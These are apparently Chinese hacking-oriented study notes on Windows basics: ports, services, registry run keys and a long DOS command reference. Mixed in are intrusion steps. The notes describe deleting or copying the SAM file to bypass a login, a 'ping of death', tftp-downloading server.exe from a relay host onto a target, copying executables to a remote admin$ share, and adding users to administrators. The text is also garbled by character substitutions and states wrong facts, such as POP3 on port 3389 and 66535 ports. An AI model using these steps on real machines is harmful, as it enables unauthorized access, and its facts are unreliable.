四.Windows基础

系统目录

Windows

               Program files

               用户

               Perflogs：是Windows7的日志信息，如磁盘扫描错误信息，删掉能够，但不建议删，删掉反而下降系统速度，perflogs是系统自动生成的。

    注意：Windows-->system32-->sam  //存放系统帐号密码的文件！

 

若是想在不知道密码的状况下进入一台电脑，咱们可使用PE先进入，找sam文件将他删除，或者拷走。这样进入电脑时就不须要密码了。

系统是64位的，会自带x86目录，要安装32位的程序，则会安装在这里。

服务

服务是一种应用程序类型，它在后台运行。服务应用程序一般能够在本地和经过网络为用户提供一些功能，例如客户端/服务器应用程序、web服务器、数据库服务器已经其余基于服务器的应用程序。

 

     根据端口区分服务！

     服务的做用：服务决定了计算机的一些功能是否被启用，不一样服务对应的功能不一样。经过计算机提供的服务能够有效实现资源共享。

     常见的服务：Web服务，dns服务（解析域名），dhcp服务（分发ip），邮件服务，Telnet服务（远程链接，和nc差很少），ssh服务，ftp服务，smb服务（文件共享）。

 

用telnet远程登录：

 

前提条件：1.处于同一网段的内网主机   2.主机有公网ip

 

Windows2003开启telnet服务。

 

从Windows7开始，启动telnet换了方式，具体方式以下：

 

这样就能够用telnet链接03虚拟机了。

端口

能够认为是计算机与外界通信交流的出口，按端口号分为3大类：公认端口；注册端口；动态/私用端口。一共有66535个端口

 

做用：一台拥有ip地址的主机能够提供许多服务，这些服务都是经过一个ip地址来实现的，那么其实是经过ip地址+端口号来区分不一样服务的。

 

端口并非一一对应的。好比：一台www服务器使用80端口，但客户端可使用不一样于80端口的其余端口进行访问。

 

常见端口（重点，记！）

 

1. HTTP协议代理服务器经常使用端口号：80/8080/3128/8081/9080

2. FTP（文件传输）协议代理服务器经常使用端口号：21

         3.Telnet（远程登陆）协议代理服务器经常使用端口号：23

         4.TFTP（trivial file transfer protocol），默认端口号为69/udp

         5.SSH（安全登陆），SCP（文件传输），端口重定向，默认的端口为22/tcp

         6.POP3 Post Office Protocol（E-mail），默认的端口号为3389

         7.TOMCAT，默认的款口号为8080

         8.win 2003 远程登录，默认的端口号为3389

         9. oracle数据库，默认端口号1521

        10.sql sever 数据库  默认端口：1433/tcp 1433/udp

         11.qq 默认端口号为 1080/tcp

经过端口：信息搜集，目标探测，服务判断，系统判断，系统角色分析。

 

注册表

注册表是microsoft windows中的一个重要的数据库，用于存储喜用和应用程序的设置信息，在windows 3.0退出OLE技术的时候，注册表就已经出现，虽

有推出的windows NT是第一个从系统级别普遍使用注册表的操做系统，可是从microsoft windows 95开始，注册表才真正成为windows用户常常接触的

内容，并在其后的操做喜用中继续沿用至今。

 

 

打开注册表--

Win+r,输入regedit，就能够打开注册表

 

在这个编辑器中们首先会出现这五个根键，在这几个根键下则是无穷多的小文件夹彼此嵌套，彻底掌握是一件不实际的事情。

注册表的做用——

注册表示windows操做喜用中的一个革新数据库，其中存放着各类参数，直接控制着windows的启动，硬件驱动程序的装载以及一些windows应用程序的运行，从而在整

个喜用中起着核心做用，这些做用包括了软件，硬件的相关配置和状态信息，好比注册表中保存有应用程序和资源管理器外科的初始条件，首选项和写在数据等，联网

计算机的整个系统的设置和各类许可，文件扩展名与应用程序的关联，硬件部件的描述，状态和属性，性能记录和其余底层的习用状态信息，以及其余数据等。

注册表结构——

1， HKEY_CLASSES_ROOT

管理文件做用，根据在windows中安装的应用称洗的扩展名，此根键指明其文件类型的名称，相应打开该文件所要调用的程序等等信息

2， HKEY_CURRENT_USER

管理系统当前的用户信息，在这个根键中保存了本地计算机中存放的当前登录的用户信息，包括用户登陆用户名和密码，在用户登陆windows 98时，其信息从HKEY _USERS中相应的项拷贝到HKEY——CURRENT_USER中

3， HKEY_LOCAL_MACHINE

管理当前系统硬件配置，在这个根键中保存了本地计算机硬件配置数据，此根键下的子关键字包括在SYSTEM.DAT中，用来提供HKEY_LOCAL_MACHINE所需的信息，或者在远程计算机中可访问的一组键中

这个根键里面的许多子键与system.ini文件中的设置项相似

4，HKEY_USERS

管理系用的用户信息，在这个根键中保存了存放在本地计算机口令列表中的用户标识和密码列表，同时每一个用户的预配置信息都存储在HYEY_CURRENT_USERS根键中，HKEY_USERS是远程计算机中访问的根键之一。

 

5，HKEY_CURRENT_CONFIG

 

管理当前用户的稀土永备至，在这个根键中保存着定义当前用户桌面配置（如显示器等等）的数据，该用户使用过的文档列表（MRU），应用程序配置和其余有关当前用户的windows 98 中文版的安装信息。

 

利用注册表防病毒——

很多计算机系统感染了网络病毒后，可能会在这些注册表中做出修改

 

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Runonce\

下次开机运行，而且只运行一次的项

 

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

开机自动启动的项

 

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices

网上有不少注册表入侵的例子！

DOS命令

Color：改变cmd颜色

 

 

 

 

在DOS中输入color ？，而后命令行会自动刷出一个列表，标明每一个代码对应的颜色，而后就输入color，空格，再加上对应代码，就能把命令行中字符的颜色改为对应颜色。

 

 

 

一次性输入了两个字符，那么第一个字符会变成背景颜色，第二个字符会变成字体颜色。

 

Ping -t -l 65500 <IP>

死亡ping（发送大于64k的文件并一直ping就成了死亡之ping） 

Ping,-t,-l,65500和IP地址之间，都有空格隔开，从字面来拆分看，“ping”是这个指令的行为，“-t”就是命令不停，“-l”指IP结尾断点，IP不用解释了你们都懂.

在这里的65500，就是在让这个数据包尽量的大，固然在真正的dos命令行中，若是输入了无效的数字，命令行会提示你输入范围必须在0到65500之间

 

TTL的意义在于，帮助判断操做系统，肯定还能经过多少路由。

 

ipconfig

查看网卡全部的参数

ipconfig/all 能够查看关于网卡更详尽的参数

 ipconfig/release 释放掉如今已经有的ip

ipconfig/renew 从新得到ip

 

systeminfo

显示这个主机的各个信息，包括各类硬件和软件。

能够查看补丁，经过没打的补丁找到系统漏洞。

这个在提权的时候会用到，查看系统打了哪些补丁，跟提权工作对比，返现没有打的补丁，能够进行提权。

局域网入侵

arp -a

用于遍历各个接口下的IP地址

 

Net view 查看局域网其余计算机名称

Shutdown -s -t 180 -c “Da4er”

-s 关机 -r 重启 -c+提示语句 -t+时间

shutdown -a 取消

cls 清屏

dir 查看目录

cd 切换目录

进入d盘：d:这样便可

start 打开文件或网址

copy con d:\123.txt 建立123.txt

hello word

ctrl+z 回车

Md 目录名 建立目录

Rd 123 删除文件夹

Ren 原文件名 新文件名    重命名文件名

Del 删除文件

Copy 复制文件

Move 移动文件

Tree 显示目录树

Net start 查看开启了哪些服务

Net start 服务名  开启服务

Net stop 服务名  中止服务

netstat -a 查看开启了哪些端口,经常使用netstat -an  

netstat -n 查看端口的网络链接状况，经常使用netstat -an  

netstat -v 查看正在进行的工做  

netstat -p 协议名 例：netstat -p tcq/ip 查看某协议使用状况（查看tcp/ip协议使用状况）  

netstat -s 查看正在使用的全部协议使用状况  

nbtstat -A ip 对方136到139其中一个端口开了的话，就可查看对方最近登录的用户名（03前的为用户名）-注意：参数-A要大写  

tracert -参数 ip(或计算机名) 跟踪路由（数据包），参数：“-w数字”用于设置超时间隔。  

ping ip(或域名) 向对方主机发送默认大小为32字节的数据，参数：“-l[空格]数据包大小”；“-n发送数据次数”；“-t”指一直ping。  

ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping)  

ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址，ipconfig可用参数“/all”显示所有配置信息  

tlist -t 以树行列表显示进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内)  

kill -F 进程名 加-F参数后强制结束某进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内)  

del -F 文件名 加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件，/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档之外的文件。例如“DEL/AR *.*”表示删除当前目录下全部只读文件，“DEL/A-S *.*”表示删除当前目录下除系统文件之外的全部文件  

 

del /S /Q 目录 或用：rmdir /s /Q 目录 /S删除目录及目录下的全部子目录和文件。同时使用参数/Q 可取消删除操做时的系统确认就直接删除。（二个命令做用相同）  

move 盘符\路径\要移动的文件名　存放移动文件的路径\移动后文件名 移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖  

fc one.txt two.txt > 3st.txt 对比二个文件并把不一样之处输出到3st.txt文件中，"> "和"> >" 是重定向命令  

at id号 开启已注册的某个计划任务  

at /delete 中止全部计划任务，用参数/yes则不须要确认就直接中止  

at id号 /delete 中止某个已注册的计划任务  

at 查看全部的计划任务  

at \\ip time 程序名(或一个命令) /r 在某时间运行对方某程序并从新启动计算机  

finger username @host 查看最近有哪些用户登录  

telnet ip 端口 远和登录服务器,默认端口为23  

open ip 链接到IP（属telnet登录后的命令）  

telnet 在本机上直接键入telnet 将进入本机的telnet  

copy 路径\文件名1　路径\文件名2 /y 复制文件1到指定的目录为文件2，用参数/y就同时取消确认你要改写一份现存目录文件  

copy c:\srv.exe $">\\ip\admin$Content$nbsp;复制本地c:\srv.exe到对方的admin下  

cppy 1st.jpg/b+2st.txt/a 3st.jpg 将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件，注：2st.txt文件头要空三排，参数：/b指二进制文件，/a指ASCLL格式文件  

copy $\svv.exe">\\ip\admin$\svv.exe c:\ 或:copy\\ip\admin$\*.* 复制对方admini$共享下的srv.exe文件（全部文件）至本地C：  

xcopy 要复制的文件或目录树　目标地址\目录名 复制文件和目录树，用参数/Y将不提示覆盖相同文件  

tftp -i 本身IP(用肉机做跳板时这用肉机IP) get server.exe c:\server.exe 登录后，将“IP”的server.exe下载到目标主机c:\server.exe 参数：-i指以二进制模式传送，如传送exe文件时用，如不加-i 则以ASCII模式（传送文本文件模式）进行传送  

tftp -i 对方IP　put c:\server.exe 登录后，上传本地c:\server.exe至主机  

ftp ip 端口 用于上传文件至服务器或进行文件操做，默认端口为21。bin指用二进制方式传送（可执行文件进）；默认为ASCII格式传送(文本文件时)  

route print 显示出IP路由，将主要显示网络地址Network addres，子网掩码Netmask，网关地址Gateway addres，接口地址Interface  

arp 查看和处理ARP缓存，ARP是名字解析的意思，负责把一个IP解析成一个物理性的MAC地址。arp -a将显示出所有信息  

start 程序名或命令 /max 或/min 新开一个新窗口并最大化（最小化）运行某程序或命令  

mem 查看cpu使用状况  

attrib 文件名(目录名) 查看某文件（目录）的属性  

attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存档，只读，系统，隐藏 属性；用＋则是添加为某属性  

dir 查看文件，参数：/Q显示文件及目录属系统哪一个用户，/T:C显示文件建立时间，/T:A显示文件上次被访问时间，/T:W上次被修改时间  

date /t 、 time /t 使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和时间，而没必要输入新日期和时间  

set 指定环境变量名称=要指派给变量的字符 设置环境变量  

set 显示当前全部的环境变量  

set p(或其它字符) 显示出当前以字符p(或其它字符)开头的全部环境变量  

pause 暂停批处理程序，并显示出：请按任意键继续....  

if 在批处理程序中执行条件处理（更多说明见if命令及变量）  

goto 标签 将cmd.exe导向到批处理程序中带标签的行（标签必须单独一行，且以冒号打头，例如：“：start”标签）  

call 路径\批处理文件名 从批处理程序中调用另外一个批处理程序 （更多说明见call /?）  

for 对一组文件中的每个文件执行某个特定命令（更多说明见for命令及变量）  

echo on或off 打开或关闭echo，仅用echo不加参数则显示当前echo设置  

echo 信息 在屏幕上显示出信息  

echo 信息 >> pass.txt 将"信息"保存到pass.txt文件中  

findstr "Hello" aa.txt 在aa.txt文件中寻找字符串hello  

find 文件名 查找某文件  

title 标题名字 更改CMD窗口标题名字  

color 颜色值 设置cmd控制台前景和背景颜色；0＝黑、1＝蓝、2＝绿、3＝浅绿、4＝红、5＝紫、6＝黄、7=白、8=灰、9=淡蓝、A＝淡绿、B=淡浅绿、C=淡红、D=淡紫、E=淡黄、F=亮白  

prompt 名称 更改cmd.exe的显示的命令提示符(把C:\、D:\统一改成：EntSky\ )  

print 文件名 打印文本文件  

 

ver 在DOS窗口下显示版本信息  

winver 弹出一个窗口显示版本信息（内存大小、系统版本、补丁版本、计算机名）  

format 盘符 /FS:类型 格式化磁盘,类型:FAT、FAT3二、NTFS ,例：Format D: /FS:NTFS  

md　目录名 建立目录  

replace 源文件　要替换文件的目录 替换文件  

ren 原文件名　新文件名 重命名文件名  

tree 以树形结构显示出目录，用参数-f 将列出第个文件夹中文件名称  

type 文件名 显示文本文件的内容  

more 文件名 逐屏显示输出文件  

doskey 要锁定的命令＝字符  

doskey 要解锁命令= 为DOS提供的锁定命令(编辑命令行，从新调用win2k命令，并建立宏)。如：锁定dir命令：doskey dir=entsky (不能用doskey dir=dir)；解锁：

 

doskey dir=  

taskmgr 调出任务管理器  

chkdsk /F D: 检查磁盘D并显示状态报告；加参数/f并修复磁盘上的错误  

tlntadmn telnt服务admn,键入tlntadmn选择3，再选择8,就能够更改telnet服务默认端口23为其它任何端口  

exit 退出cmd.exe程序或目前，用参数/B则是退出当前批处理脚本而不是cmd.exe  

path 路径\可执行文件的文件名 为可执行文件设置一个路径。  

cmd 启动一个win2K命令解释窗口。参数：/eff、/en 关闭、开启命令扩展；更我详细说明见cmd /?  

regedit /s 注册表文件名 导入注册表；参数/S指安静模式导入，无任何提示；  

regedit /e 注册表文件名 导出注册表  

cacls 文件名　参数 显示或修改文件访问控制列表（ACL）——针对NTFS格式时。参数：/D 用户名:设定拒绝某用户访问；/P 用户名:perm 替换指定用户的访问权限；/G 用户名:perm 赋予指定用户访问权限；Perm 能够是: N 无，R 读取， W 写入， C 更改(写入)，F 彻底控制；例：cacls D:\test.txt /D pub 设定d:\test.txt拒绝pub用户访问。  

cacls 文件名 查看文件的访问用户权限列表  

REM 文本内容 在批处理文件中添加注解  

 

重点

net user  用户名 密码 /add 建立用户

net user guest /active:yes 激活guest(来宾用户)

net user 查看有哪些用户

net user 帐号名 查看帐号的属性

net localgroup administrators 用户名 /add 把"用户"添加到管理员中使其有管理员的权限

net password 密码 更改系统登录密码

net share 查看本地开启的共享

 

经常使用的windows服务

DHCP服务

动态主机设置协议（英语：Dynamic Host Configuration Protocol，DHCP）是一个局域网的网络协议，使用UDP协议工做，主要有两个用途：用于内部网或网络服务供应商自动分配IP地址；给用户用于内部网管理员做为对全部计算机做中央管理的手段。

二.服务器判断的顺序(如图):

1.本地缓存

2.本地数据

3，转发器

iis服务器

在一个web服务器搭建网站的三种方法：

1.同一个ip，不一样端口

2.同一个ip，不一样域名

3.不一样ip，同一个端口(不经常使用) 意义不大

一个小型的数据流